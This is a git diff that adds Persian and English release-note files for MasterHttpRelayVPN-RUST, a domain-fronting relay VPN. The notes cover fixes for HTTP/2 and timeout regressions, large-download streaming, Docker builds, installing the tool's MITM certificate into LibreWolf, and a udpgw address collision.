+• **Fix Full mode regression از v1.9.15** ([#924](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/924) — یک ۳-هفته‌ای tracking thread با ۱۸+ duplicate report، fixed by [@rezaisrad](https://github.com/rezaisrad) in [PR #1029](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1029)). علامت: \`batch timed out after 30s\` در Full mode، در حالی که apps_script mode normal کار می‌کرد. فقط workaround موجود \`"force_http1": true\` kill switch بود. Bisect دقیق این رو به [\`0e678630a\`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/0e678630a) (PR #799 که h2 multiplexing رو اضافه کرد) رساند. روت کاز یک‌ line ordering: \`warm()\` در v1.9.15 h1 prewarm loop رو پشت \`ensure_h2().await\` گذاشت — وقتی h2 handshake کند بود (تا 8s)، pool h1 خالی می‌موند. اگر در آن window یک request می‌آمد، h1 fallback یک TCP+TLS handshake cold می‌زد که خود stall می‌شد، outside the 30s batch_timeout. Fix: h1 prewarm parallel با h2 handshake (v1.9.14 ordering restored)، plus بستنک‌های پیرامون با \`H1_OPEN_TIMEOUT_SECS = 8\` و \`H2Cell.dead\` AtomicBool. ۲۰۸ → **۲۰۹ lib test** (+1 regression: \`ensure_h2_rejects_dead_cell_within_ttl\`). تأیید end-to-end: 5/5 cold restarts pass (9.6-22.5s)، 5/5 concurrent SOCKS5 burst.
+---
+• **Fix Full mode regression since v1.9.15** ([#924](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/924), [PR #1029](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1029) by @rezaisrad). #924 was the canonical tracking thread for an 18+ duplicate cluster spanning ~3 weeks; affected users saw `batch timed out after 30s` on every Full-mode request while apps_script mode kept working. The only available workaround was the `"force_http1": true` kill switch.
+
+**Root cause** (rigorously bisected to [`0e678630a`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/0e678630a) — PR #799 which added HTTP/2 multiplexing): PR #799 gated the h1 socket-pool prewarm behind `ensure_h2().await`. `ensure_h2()` is bounded by `H2_OPEN_TIMEOUT_SECS = 8s` but can take the full window on a cold first connection. During that window the h1 fallback pool was empty, so any request that arrived would:
+
+1. Get `Err((Relay("h2 unavailable"), No))` immediately → fall back to h1
+2. Empty pool → cold `open()` → fresh TCP+TLS to `connect_host:443`
+3. Same network conditions that stalled h2 also stalled h1; cold open exceeded the 30s `batch_timeout`
+4. User saw `batch timed out after 30s` that "works on apps_script" couldn't explain
+
+**Fix** (two commits, `domain_fronter.rs`-only):
+
+1. **`warm h1 pool in parallel with h2`**: spawn h2 prewarm in a separate task so the h1 prewarm loop runs concurrently. Full `n` h1 sockets are warm before user traffic, even when h2 stalls. `run_pool_refill` trims back to `POOL_MIN_H2_FALLBACK = 2` within 5s once h2 lands as the fast path.
+
+2. **`bound h1 open() + detect dead h2 cells synchronously`**: `H1_OPEN_TIMEOUT_SECS = 8` wraps the TCP+TLS handshake in `open()` so a stuck handshake doesn't block `acquire()` until the outer batch budget elapses. `H2Cell.dead: Arc<AtomicBool>` flipped by the connection driver task when `Connection::await` ends — known-dead cells are rejected within ≤5s instead of waiting for `H2_CONN_TTL_SECS = 540s` to expire.
+
+**API impact**: `h2_handshake_post_tls` return type changes to `(SendRequest, Arc<AtomicBool>)`. One existing test (`h2_handshake_post_tls_returns_alpn_refused_when_peer_picks_h1`) tweaks its `Ok` arm to match — no panic message change.
+
+208 → **209 lib tests** (+1 regression: `ensure_h2_rejects_dead_cell_within_ttl`). Live end-to-end (per PR notes): 5/5 cold restarts pass in 9.6-22.5s, 5/5 concurrent SOCKS5 burst, default full.json baseline 200 OK in 13.3s.
+
+**Action for affected users**: update to v1.9.20, drop the `"force_http1": true` workaround from `config.json` if you had it set. Full mode should work reliably on cold restart again.
diff --git a/docs/changelog/v1.9.21.md b/docs/changelog/v1.9.21.md
new file mode 100644
index 00000000..472053ff
--- /dev/null
+++ b/docs/changelog/v1.9.21.md
@@ -0,0 +1,31 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Perf: skip H2 برای Full-tunnel batch requests** ([PR #1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040) by @yyoyoian-pixel). Full mode tunnel batches قبلاً N op رو در یک HTTP request coalesce می‌کنند — H2 stream multiplexing چیزی برای multiplex کردن نداره. H2 try/fallback path در این مسیر خاص سه regression از v1.9.14 معرفی کرد: (1) long-poll stallها در ۱۶-۱۷s به جای 10s timeout روی H1 — هر poll ~۶۰٪ بیشتر slot Apps Script رو نگه می‌داشت، (2) silent batch drops via \`RequestSent::Maybe\` بدون retry، (3) pool starvation از \`POOL_MIN_H2_FALLBACK = 2\` که از 8 → 2 trim می‌کرد. H2 multiplexing برای **relay mode** (apps_script) فعال می‌مونه — اونجا واقعاً به‌درد می‌خوره (r0ar در #962 confirmed). A/B روی Pixel 6 Pro: **0/30 vs 8-10/30** long-poll stalls. ۲۰۹ lib test still pass. v1.9.14 tunnel performance بازگشت + همه v1.9.15+ improvements حفظ شد (relay mode h2، zero-copy mux، block DoH/QUIC، PR #1029 warm-race fix).
+---
+• **Perf: skip H2 for Full-tunnel batch requests** ([PR #1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040) by @yyoyoian-pixel). Tunnel batches already coalesce N ops into one HTTP request — H2 stream multiplexing has nothing to multiplex on this code path. The H2 try/fallback block introduced three regressions vs v1.9.14:
+
+1. **Long-poll stalls**: idle polls completed at 16-17s (`LONGPOLL_DEADLINE` + network latency) instead of timing out at 10s on H1. Each poll held an Apps Script execution slot ~60% longer.
+2. **Silent batch drops**: `RequestSent::Maybe` failures dropped the entire batch with no retry — a failure mode H1 doesn't have.
+3. **Pool starvation**: `POOL_MIN_H2_FALLBACK = 2` trimmed the H1 pool from 8 → 2 once H2 connected, but tunnel batches still used H1 and needed the full pool.
+
+H2 multiplexing **stays active for relay mode** (non-full) where each browser request is a separate HTTP call that genuinely benefits from stream multiplexing — r0ar's controlled A/B test in #962 confirmed h2 is strictly better than `force_http1: true` for apps_script-mode users, and that path is unchanged here.
+
+## Changes (`domain_fronter.rs`-only, -54/-12 lines, +12 net)
+
+- `tunnel_batch_request_to`: remove H2 try/fallback/NonRetryable block, go straight to H1 pool `acquire()`.
+- `run_pool_refill`: always maintain `POOL_MIN = 8`. Remove the `POOL_MIN_H2_FALLBACK = 2` trim.
+
+## A/B results (Pixel 6 Pro, 30 batch samples each)
+
+| Metric | H2 (stock v1.9.20) | H1 (this release) | v1.9.14 (baseline) |
+|---|---|---|---|
+| 16-17s batches | **8-10/30** | **0/30** | **0/30** |
+| 10s timeouts | 0 | 4/30 | 5/30 |
+| Active RTTs | 1.4-2.4s | 1.3-2.2s | 1.4-2.3s |
+
+Restores v1.9.14 tunnel performance while keeping all v1.9.15+ improvements (H2 for relay, zero-copy mux from PR #881, block DoH/QUIC defaults from v1.9.13/14, PR #1029's warm-race fix from v1.9.20).
+
+## Interaction with v1.9.20 (PR #1029)
+
+PR #1029 added `H2Cell.dead: Arc<AtomicBool>` for synchronous dead-cell detection. With this release removing the H2 path for tunnel batches, the dead-cell flag scopes to relay mode only — that's intentional (the flag was protecting the relay path in practice). No regression.
+
+209 lib tests still pass (no test changes — the affected paths are exercised by integration probes which the PR reporter ran on Pixel 6 Pro).
diff --git a/docs/changelog/v1.9.22.md b/docs/changelog/v1.9.22.md
new file mode 100644
index 00000000..89ab780a
--- /dev/null
+++ b/docs/changelog/v1.9.22.md
@@ -0,0 +1,20 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix: skip H2 برای \`tunnel_request\` (single ops) — completes [#1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040)** ([PR #1041](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1041) by @yyoyoian-pixel). v1.9.21's PR #1040 H2 رو از \`tunnel_batch_request_to\` skip کرد ولی \`tunnel_request\` (single-op path برای plain \`connect\` ops) جا موند. کاربرانی که session‌های full-tunnel با single-op path داشتند هنوز ۱۶-۱۷s long-poll stalls می‌گرفتن. این PR fix رو complete می‌کنه — same shape: حذف H2 try/fallback/NonRetryable block، مستقیم H1 pool \`acquire()\`. همه ۵ تا call site \`h2_relay_request\` audit شدن (جدول در PR description) — relay-mode paths H2 رو نگه می‌دارن (apps_script users بدون change)، همه full-tunnel paths حالا H1-only. ۲۰۹ lib test still pass.
+---
+• **Fix: skip H2 for `tunnel_request` (single ops) — completes [#1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040)** ([PR #1041](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1041) by @yyoyoian-pixel).
+
+v1.9.21's PR #1040 skipped H2 for `tunnel_batch_request_to` but missed `tunnel_request` — the single-op path used for plain `connect` ops. Users on full-tunnel sessions that went through the single-op path still saw 16-17s long-poll stalls. This PR completes the fix: same shape, remove the H2 try/fallback/NonRetryable block from `tunnel_request`, go straight to H1 pool `acquire()`.
+
+All 5 `h2_relay_request` call sites audited:
+
+| Call site | Function | Mode | H2 skipped? |
+|---|---|---|---|
+| `do_relay_once_with` | relay | Relay | No (correct — relay benefits from H2) |
+| `relay()` exit-node | relay | Relay | No (correct) |
+| `tunnel_request` | tunnel single op | Full tunnel | **Yes (this release)** |
+| `tunnel_batch_request_to` | tunnel batch | Full tunnel | Yes (v1.9.21) |
+| `tunnel_batch_request_with_timeout` | tunnel batch | Full tunnel | Yes (v1.9.21) |
+
+No other full-tunnel paths use H2 after this fix. Relay-mode H2 stays — r0ar's controlled A/B in #962 confirmed h2 is strictly better for apps_script-mode users, and that path is unchanged.
+
+209 lib tests still pass. `domain_fronter.rs`-only, -41 net lines.
diff --git a/docs/changelog/v1.9.23.md b/docs/changelog/v1.9.23.md
new file mode 100644
index 00000000..f1929499
--- /dev/null
+++ b/docs/changelog/v1.9.23.md
@@ -0,0 +1,25 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix: stream range-parallel downloads larger than Apps Script's 50 MiB cap** ([#1042](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1042) + [PR #1085](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1085) by @dazzling-no-more). دانلودهای range-capable بزرگ‌تر از ~۵۰ MiB از طریق Apps Script relay با \`504 Relay timeout — Apps Script unresponsive\` fail می‌شد. v2rayN DMG 104 MiB در reported logs canonical repro بود. روت کاز: \`relay_parallel_range\` در 64 MiB ceiling داشت و برای بالاتر به single \`relay()\` fallback می‌کرد که از 50 MiB Apps Script ceiling عبور می‌کرد، Apps Script script رو mid-execution می‌کشت، و 25s timeout. Fix: \`relay_parallel_range\` به writer-based API تبدیل شد که large files رو chunk-by-chunk (هر chunk ≤256 KiB، خوب زیر 50 MiB cap) به client socket stream می‌کنه. ۴-way dispatch: Buffered (≤40 MiB)، Stream (40 MiB-16 GiB)، FallbackSingleGet (wrapper 40-64 MiB)، RejectTooLarge (>16 GiB، quota guard). Lazy range planning با \`saturating_*\` — O(1) memory حتی برای \`u64::MAX\` total (قبل ~6 GB Vec allocation می‌داد). MITM HTTPS + plain HTTP call sites + CORS-aware \`transform_head\` همه updated. ۲۰۹ → **۲۲۷ lib test** (+۱۸ new: dispatch enum، lazy planning، head assembly، head transform، streaming writer، flush behavior، CORS-into-streaming integration).
+---
+• **Fix: stream range-parallel downloads larger than Apps Script's 50 MiB cap** ([#1042](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1042) + [PR #1085](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1085) by @dazzling-no-more).
+
+Range-capable downloads larger than ~50 MiB through the Apps Script relay returned `504 Relay timeout — Apps Script unresponsive` instead of the file. The 104 MiB v2rayN DMG in the reported logs was the canonical repro (also fixes @Paymanonline's #1077 report).
+
+**Root cause**: `relay_parallel_range` capped the stitched response at 64 MiB and fell back to a single `relay()` for anything larger. Single-GET routes through Apps Script's ~50 MiB response ceiling, so Apps Script killed the script mid-execution and we hung for the full 25s relay timeout before returning 504.
+
+**Fix**: convert `relay_parallel_range` into a writer-based API that streams large files chunk-by-chunk to the client socket. Each chunk is still one ≤256 KiB Apps Script call (well under the 50 MiB cap); only the host-side buffering changes. Backward-compatible `Vec<u8>` wrapper preserves the pre-v1.9.23 API surface for external library consumers.
+
+Three-way dispatch via `RangeDispatch { Buffered, Stream, FallbackSingleGet, RejectTooLarge }` and the pure `dispatch_range_response(total, streaming_allowed)` predicate:
+
+- **`Buffered`** — `total ≤ APPS_SCRIPT_BODY_MAX_BYTES` (40 MiB) on either surface. Existing stitch + single-GET fallback path; fully recovers on chunk failure.
+- **`Stream`** — writer API above 40 MiB. Streams; chunk failure flushes the committed prefix and returns `Err` so the `Content-Length` mismatch tells download clients to resume via `Range`.
+- **`FallbackSingleGet`** — wrapper above 64 MiB. Falls back to `self.relay()`, matching the pre-v1.9.23 cliff for external library consumers stuck on the old API.
+- **`RejectTooLarge`** — writer API above 16 GiB. Refuses with 502; bounds worst-case Apps Script quota drain from a hostile origin advertising an absurd `Content-Range` total.
+
+**Memory bounds**: Lazy `plan_remaining_ranges` via `std::iter::from_fn` + `saturating_*`. Range planning is `O(1)` memory regardless of advertised total — even a `u64::MAX` total no longer drives a ~6 GB `Vec<(u64, u64)>` allocation.
+
+**CORS interaction**: MITM HTTPS and plain-HTTP call sites updated to use `relay_parallel_range_to` with a CORS-aware `transform_head` closure. New `inject_cors_into_head` (head-only variant of `inject_cors_response_headers`) lets the streaming path rewrite ACL headers before the body has been assembled.
+
+209 → **227 lib tests** (+18 new: `RangeDispatch` enum coverage, lazy range planning under `u64::MAX`, `assemble_200_head` correctness, `transform_head` closure invocation, streaming writer chunk-by-chunk semantics, head-then-flush-before-body ordering, CORS-into-streaming cross-module integration).
+
+**User impact**: GitHub release downloads, large CDN binaries, ROM-hack distributions, anything in the 50 MiB – 16 GiB range now downloads successfully through apps_script mode. Previously these required Full mode, an Iran-mirror proxy (#1077), or a friend-with-VPS workaround.
diff --git a/docs/changelog/v1.9.24.md b/docs/changelog/v1.9.24.md
new file mode 100644
index 00000000..6a4a8c47
--- /dev/null
+++ b/docs/changelog/v1.9.24.md
@@ -0,0 +1,25 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix Full mode timeout cascade — \`batch header read honors request_timeout_secs\`** ([#1088](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1088), [PR #1108](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1108) by @dazzling-no-more). در Full mode، یک Apps Script edge کند، تمام تونل sessionهای hot-and-flowing رو cascade-kill می‌کرد. کاربرها روی v1.9.21+ مرتب 10s "batch timeout" می‌دیدن و download progress تلگرام/browser رو از دست می‌دادن. **Root cause**: \`read_http_response\` در \`domain_fronter.rs\` یک hardcoded 10s header-read timeout داشت که داخل \`tunnel_batch_request_to\` اجرا می‌شد — مستقل از و کوتاه‌تر از outer \`tokio::time::timeout(batch_timeout, ...)\` در \`fire_batch\`. Apps Script cold starts معمولاً 8-12s طول می‌کشن (PR #1040's A/B 4/30 H1 batches رو ثبت کرد که دقیقاً 10s timeout می‌شدن)، پس inner cliff به‌عنوان false-positive batch timeout قبل از اینکه \`request_timeout_secs\` (default 30s) trigger بشه fire می‌شد. **Fix**: (1) \`tunnel_batch_request_to\` حالا \`batch_timeout\` رو به header read pass می‌کنه via new \`read_http_response_with_header_timeout\` helper. (2) Header read یک absolute deadline استفاده می‌کنه (\`timeout_at\`) به جای per-read \`timeout()\` — slow drip-feed peer دیگه نمی‌تونه silently extend بزنه. (3) Bonus: \`TunnelMux::reply_timeout\` با \`batch_timeout\` co-vary می‌کنه (\`batch_timeout + 5s slack\`). ۲۰۹ → **۲۳۱ lib test** (+22 regression).
+• **Docker: cargo-chef برای build بدون BuildKit** ([#620](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/620), [PR #1117](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1117) by @dazzling-no-more). \`tunnel-node/Dockerfile\` از BuildKit-only \`RUN --mount=type=cache\` استفاده می‌کرد که روی Cloud Run's \`gcloud run deploy --source .\` path شکست می‌خورد (underlying \`gcr.io/cloud-builders/docker\` builder BuildKit رو enable نمی‌کنه). cargo-chef pattern: \`recipe.json\` planner stage + \`cargo chef cook\` deps stage + final build with \`src/\` on top. Docker's regular layer cache حالا dependency reuse رو handle می‌کنه — warm rebuilds تنها \`src/\` رو compile می‌کنن. Base bump \`rust:1.85-slim\` → \`rust:1.90-slim\` (cargo-chef نیاز به rustc 1.86+ داره).
+---
+• **Fix Full mode timeout cascade — `batch header read honors request_timeout_secs`** ([#1088](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1088), [PR #1108](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1108) by @dazzling-no-more). Under Full mode, a single slow Apps Script edge cascade-killed every in-flight tunnel session sharing its batch. Users on v1.9.21+ saw frequent 10s "batch timeout" errors and lost download progress on Telegram / browser sessions.
+
+**Root cause**: `read_http_response` in `domain_fronter.rs` had a **hardcoded 10s header-read timeout** that ran *inside* `tunnel_batch_request_to` — independent of and shorter than the outer `tokio::time::timeout(batch_timeout, …)` in `fire_batch`. Apps Script cold starts routinely land in the 8-12s range (PR #1040's A/B recorded 4/30 H1 batches timing out at exactly 10s after the H2→H1 switch), so the inner cliff fired as a false-positive batch timeout well before `request_timeout_secs` (default 30s) could.
+
+**Fix** (in `domain_fronter.rs` + `tunnel_client.rs`):
+
+1. `tunnel_batch_request_to` passes `batch_timeout` to the header read via new `read_http_response_with_header_timeout` helper. `Config::request_timeout_secs` is now the only knob controlling how long we wait for an Apps Script edge to start responding. Other callers (relay path, exit-node) keep the historical 10s value.
+2. Header read uses a single **absolute deadline** (`timeout_at`) instead of per-read `timeout()`. Total elapsed across all header reads is bounded regardless of read cadence — a slow drip-feed peer can no longer silently extend.
+3. **`TunnelMux::reply_timeout`** co-varies with `batch_timeout` (computed at construction as `fronter.batch_timeout() + 5s slack` instead of fixed 35s const). Operators raising `request_timeout_secs` no longer have sessions abandon `reply_rx` just before `fire_batch`'s HTTP round-trip would complete.
+
+209 → **231 lib tests** (+22 regression covering the deadline/co-variance behavior).
+
+• **Docker: cargo-chef so tunnel-node builds without BuildKit** ([#620](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/620), [PR #1117](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1117) by @dazzling-no-more). `tunnel-node/Dockerfile` used BuildKit-only `RUN --mount=type=cache` directives, breaking on Cloud Run's `gcloud run deploy --source .` path (the underlying `gcr.io/cloud-builders/docker` builder doesn't enable BuildKit, and `--set-build-env-vars DOCKER_BUILDKIT=1` doesn't flip it on either).
+
+Reworked to use **cargo-chef**: a dedicated planner stage emits `recipe.json` for dependency metadata, a `cargo chef cook` stage builds just the deps in their own Docker layer, the final build stage adds `src/` on top. Docker's regular layer cache handles dependency reuse — warm rebuilds where only `src/` changes still skip the slow crate compile.
+
+Base bump `rust:1.85-slim` → `rust:1.90-slim` (cargo-chef's transitive deps require rustc 1.86+; tunnel-node's `Cargo.toml` has no `rust-version` pin so the bump is internal-only).
+
+**Action for Cloud Run users blocked on #620**: pull v1.9.24 of the tunnel-node Docker image (`ghcr.io/therealaleph/mhrv-tunnel-node:v1.9.24` or `:latest`) — your `gcloud run deploy --source .` should now succeed without BuildKit.
+
+**Followup**: issue #1131 (BuffOvrFlw) reports `h1 open timed out after 8s` — that's the `H1_OPEN_TIMEOUT_SECS = 8` from PR #1029 firing on `open()` (TCP+TLS handshake), separate from the header-read timeout this release fixes. Worth a follow-up PR to make `H1_OPEN_TIMEOUT_SECS` parameterized via `request_timeout_secs` too.
diff --git a/docs/changelog/v1.9.25.md b/docs/changelog/v1.9.25.md
new file mode 100644
index 00000000..defdd48a
--- /dev/null
+++ b/docs/changelog/v1.9.25.md
@@ -0,0 +1,63 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+<div dir="rtl">
+
+• **نصب MITM CA در LibreWolf** ([#1145](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1145), [PR #1159](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1159) by @dazzling-no-more). کاربران LibreWolf با خطای `MOZILLA_PKIX_ERROR_MITM_DETECTED` روی سایت‌های HSTS-protected (bing.com، youtube.com، …) مواجه می‌شدن. **علت**: `cert_installer.rs` فقط Firefox profile rootها رو scan می‌کرد. LibreWolf یک Firefox fork است که همون NSS DB layout رو share می‌کنه ولی profile tree خودش رو زیر app dir خودش نگه می‌داره — هیچ‌کدوم از `certutil -A` per-profile install یا `user.js` enterprise-roots auto-trust fallback به LibreWolf نمی‌رسیدن. **راه‌حل**: `firefox_profile_dirs()` → `mozilla_family_profile_dirs()` که هم Firefox هم LibreWolf paths رو per-OS برمی‌گردونه. هیچ تغییری برای کاربران Firefox. ۲۳۱ → **۲۳۹ lib test** (+۸ regression برای LibreWolf path discovery). همان class از bug که قبلاً در #955 و #959 (Firefox-fork) closed شده بود.
+
+• **رفع باگ Full mode «Google و اکثر سایت‌ها خراب، تلگرام سالم» — `udpgw magic IP از داخل virtual-DNS range tun2proxy منتقل شد`** ([#251](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/251) by @dazzling-no-more).
+
+در Full mode روی Android، تلگرام کار می‌کرد ولی Google search و اکثر سایت‌ها silently fail می‌شدن — `apps_script` mode روی همون device سالم بود و VPS هم idle.
+
+**علت**: آدرس magic مربوط به udpgw (یعنی `198.18.0.1:7300`) داخل `198.18.0.0/15` بود، یعنی دقیقاً همون range‌ای که `tun2proxy --dns virtual` ازش IPهای ساختگی رو برای hostname lookupها اختصاص می‌ده. هر دفعه که virtual DNS اتفاقاً `198.18.0.1` رو به یک hostname مثل `www.google.com` allocate می‌کرد، traffic اون host به‌عنوان udpgw connection مصادره می‌شد و drop می‌شد. تلگرام immune بود چون native clientش از IPهای عددی hardcoded استفاده می‌کنه؛ همچنین `apps_script` mode هم immune بود چون اصلاً `--udpgw-server` ست نمی‌کنه.
+
+**راه‌حل**: ثابت `UDPGW_MAGIC_IP` به `192.0.2.1` (RFC 5737 TEST-NET-1) منتقل شد. دو فایل تغییر کرده: یکی `tunnel-node/src/udpgw.rs` (constant + tests) و دیگری `android/.../MhrvVpnService.kt` (که حالا از یک companion const به اسم `UDPGW_MAGIC_DEST` استفاده می‌کنه).
+
+**سازگاری با نسخه‌های قدیمی**: نسخهٔ جدید tunnel-node همچنان `198.18.0.1:7300` قدیمی رو هم accept می‌کنه برای یک deprecation cycle (حذف در v1.10.0) — یعنی اگه VPS رو زودتر آپدیت کنی، Android قدیمی هنوز کار می‌کنه. **ولی اگه Android رو زودتر آپدیت کنی، tunnel-node قدیمی UDP relay رو در Full mode break می‌کنه**. توصیه: اول tunnel-node رو آپدیت کن، بعد APK رو.
+
+</div>
+---
+• **Install MITM CA into LibreWolf NSS stores** ([#1145](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1145), [PR #1159](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1159) by @dazzling-no-more). LibreWolf users were getting `MOZILLA_PKIX_ERROR_MITM_DETECTED` when visiting HSTS-protected sites (bing.com, youtube.com, …) through mhrv-rs's MITM mode. HSTS gives no "Add Exception" affordance, so users were fully locked out despite the OS-level CA install having succeeded.
+
+**Root cause**: `cert_installer.rs` only scanned Firefox profile roots (`~/.mozilla/firefox`, the snap variant, `%APPDATA%\Mozilla\Firefox\Profiles`, `~/Library/Application Support/Firefox/Profiles`). LibreWolf is a Firefox fork that shares Firefox's NSS DB layout and respects the same `security.enterprise_roots.enabled` pref, but stores its profile tree under its own app dir — neither the per-profile `certutil -A` install nor the `user.js` enterprise-roots auto-trust fallback ever touched LibreWolf. Same failure mode as already-closed #955 / #959 (Firefox-fork users).
+
+**Fix**: extend Mozilla-family profile discovery to cover LibreWolf on every supported platform. `firefox_profile_dirs()` → `mozilla_family_profile_dirs()` (returns union of Firefox + LibreWolf paths per-OS). Per-OS coverage:
+- **Linux**: `~/.mozilla/firefox`, snap variant, `~/.librewolf`, `$XDG_CONFIG_HOME/librewolf`.
+- **macOS**: `~/Library/Application Support/Firefox/Profiles`, `~/Library/Application Support/LibreWolf/Profiles`.
+- **Windows**: `%APPDATA%\Mozilla\Firefox\Profiles`, `%APPDATA%\LibreWolf\Profiles`.
+
+No behavioural change for Firefox installs. 231 → **239 lib tests** (+8 regression for LibreWolf path discovery on each OS).
+
+---
+
+• **Fix Full mode "Google + most websites broken while Telegram works" — `udpgw magic IP moved out of tun2proxy virtual-DNS range`** ([#251](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/251) by @dazzling-no-more). Users on Android Full mode reported that Telegram worked fine but Google search and most other websites failed to load — while apps_script mode on the same device + same `google_ip` worked perfectly and the VPS was sitting idle.
+
+**Root cause**: the udpgw magic destination address (`198.18.0.1:7300`) lived inside `198.18.0.0/15` — the exact same range that tun2proxy's `--dns virtual` allocator uses to synthesise fake IPs for hostname lookups. Whenever virtual DNS happened to assign `198.18.0.1` to a real hostname (e.g. `www.google.com`), that hostname's connections were intercepted by tun2proxy *itself* as a udpgw request before they ever reached the SOCKS5 proxy. Result: a random subset of DNS-resolved hosts silently broke per session, depending on which hostname won the `198.18.0.1` allocation. Telegram was unaffected because its native client uses hardcoded numeric IPs (no DNS allocation needed). apps_script mode was unaffected because it doesn't pass `--udpgw-server` to tun2proxy at all.
+
+**Fix**: relocate `UDPGW_MAGIC_IP` from `198.18.0.1` to `192.0.2.1` (RFC 5737 TEST-NET-1). TEST-NET-1 is reserved for documentation, never routed on the public internet, and — critically — outside any virtual-DNS allocation pool. Structurally equivalent to the old address as a "guaranteed-not-real-destination", just no longer colliding with tun2proxy's reserved range.
+
+Coordinated two-side change:
+
+1. **`tunnel-node/src/udpgw.rs`**: `UDPGW_MAGIC_IP = [192, 0, 2, 1]`, doc comment now cites RFC 5737 + explicitly explains why it must stay out of `198.18.0.0/15`. Test additions: `is_udpgw_dest_works` covers both the new IP and the legacy IP (back-compat assertion); new `magic_ip_outside_virtual_dns_range` enforces the invariant at the `198.18.0.0/15` *range* level, so any future move to `198.19.x.y` would also fail the test rather than re-introducing the same class of bug.
+2. **`android/.../MhrvVpnService.kt`**: `--udpgw-server $UDPGW_MAGIC_DEST` where `UDPGW_MAGIC_DEST = "192.0.2.1:7300"` is a new companion-object constant, with a docstring pointing back at the Rust constant — gives the next editor a single, labelled place to update if the convention ever changes again.
+
+**Back-compatibility — partial, one-way**:
+
+The udpgw magic IP is a wire-protocol convention between the Android client and the `mhrv-tunnel` Docker container. v1.9.25 tunnel-nodes accept both the new `192.0.2.1:7300` and the legacy `198.18.0.1:7300` for one deprecation cycle (slated for removal in v1.10.0). That softens — but does *not* fully resolve — the asymmetric-upgrade matrix:
+
+| Android | Tunnel-node | Full-mode UDP relay |
+|---|---|---|
+| v1.9.25 | v1.9.25 | ✅ fully fixed |
+| ≤v1.9.24 | v1.9.25 | ⚠️ udpgw handshake works (legacy IP still recognised by the node), but the **old client still asks tun2proxy for `--udpgw-server 198.18.0.1:7300`** — meaning the underlying #251 virtual-DNS-pool collision is still live on the device. Telegram works; the random Google-search-style breakage persists until the APK is updated. |
+| v1.9.25 | ≤v1.9.24 | ❌ **breaks silently** — new client sends `192.0.2.1`, old node treats it as a real TCP destination and the connect fails |
+| ≤v1.9.24 | ≤v1.9.24 | unchanged from before (still has the original #251 bug) |
+
+**Recommended upgrade order**: update **both halves** to v1.9.25. The fix is on the *client* side (which magic IP it asks tun2proxy to reserve) — the tunnel-node back-compat shim only prevents a hard handshake break during the window where the node is upgraded first; it does not fix the original bug. If you can only update one half right now: do the **APK first** (or both together), since updating just the tunnel-node leaves clients still hitting the virtual-DNS collision. `apps_script`-only users are unaffected (the udpgw path isn't used in apps_script mode).
+
+**Diagnostic note for stuck users**: if Telegram works on Full mode but Google search / random websites silently fail on v1.9.24 or earlier, this is your bug. As a workaround pending upgrade, add Google domains to `passthrough_hosts` to route them through tunnel-node like Telegram does:
+
+```json
+{
+  "passthrough_hosts": [".google.com", ".gstatic.com", ".googleusercontent.com", ".googleapis.com", ".youtube.com", ".ytimg.com"]
+}
+```
+
+Slower per-request (Apps Script overhead) but bypasses the virtual-DNS clash entirely. Remove once both halves are on v1.9.25.
diff --git a/docs/changelog/v1.9.3.md b/docs/changelog/v1.9.3.md
new file mode 100644
index 00000000..7256d57d
--- /dev/null
+++ b/docs/changelog/v1.9.3.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• toggle `youtube_via_relay` در Android Advanced settings (PR [#535](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/535) از @yyoyoian-pixel، closes [#520](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/520)): تا قبل، desktop UI checkbox `youtube_via_relay` داشت ولی Android UI نه — کاربران Android مجبور بودن config.json رو دستی edit کنن (که بدون root کارش نشدنی بود). حالا Switch toggle در بخش Advanced settings در Android UI هست + match با desktop UI checkbox. شامل field `youtubeViaRelay` در `MhrvConfig` با JSON serialization (`youtube_via_relay` به‌عنوان wire format)، deserialization، + encode برای config-sharing. resources rشته EN + FA برای label + helper text. تغییر pure Android/Kotlin؛ بدون Rust impact.
+• fix CI: `gh release download` در workflow Telegram publish با `--clobber` کار می‌کنه تا retries بعد از partial download کار کنه (no user impact، ولی v1.9.2 release برای Telegram channel به‌خاطر این bug fail شد + manual re-publish لازم شد).
+---
